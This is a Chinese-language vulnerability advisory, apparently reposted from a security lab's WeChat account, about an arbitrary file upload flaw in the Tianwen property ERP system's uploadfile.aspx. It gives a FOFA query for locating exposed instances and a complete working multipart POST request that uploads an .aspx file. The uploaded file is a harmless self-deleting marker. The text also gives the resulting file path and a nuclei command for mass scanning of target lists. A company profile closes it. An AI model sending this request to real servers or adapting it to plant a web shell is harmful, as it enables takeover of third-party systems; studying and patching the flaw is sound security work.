0x01 漏洞描述
成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案,实现物管公司的管理升级;以平台搭建和资源整合为基础,建立社区O2O服务平台,向物管公司提供旨在完善服务、方便业主、增加收益为目标的智慧小区综合服务平台,实现物业公司的服务转型。天问物业ERP系统 uploadfile.aspx存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷。
0x02 漏洞复现
fofa:body=”天问物业ERP系统”
1.执行POC写入文件,返回上传文件路径
POST /HM/M_Main/uploadfile.aspx HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1022
------WebKitFormBoundarytKnDdPq6SMXufwyT
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=
------WebKitFormBoundarytKnDdPq6SMXufwyT
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
DE1005D5
------WebKitFormBoundarytKnDdPq6SMXufwyT
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs
------WebKitFormBoundarytKnDdPq6SMXufwyT
Content-Disposition: form-data; name="BtnSave"
确定上传
------WebKitFormBoundarytKnDdPq6SMXufwyT
Content-Disposition: form-data; name="upload_img"; filename="1.aspx"
Content-Type: application/octet-stream
<%"C#"%> Language=
<%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("MHhvbGQ2"))); System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundarytKnDdPq6SMXufwyT
2.访问该路径,得到上传内容/HM/M_Main/OAUpLoadFile/2022/09/20229611586.aspx
3.nuclei批量验证脚本已发表于知识星球
nuclei.exe -t Tianwen_ERP_uploadfile.yaml -l subs.txt -stats
(注:本文章为技术分享,禁止任何非授权攻击行为)
长按二维码并识别进入
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):天问物业ERP系统 uploadfile.aspx 任意文件上传漏洞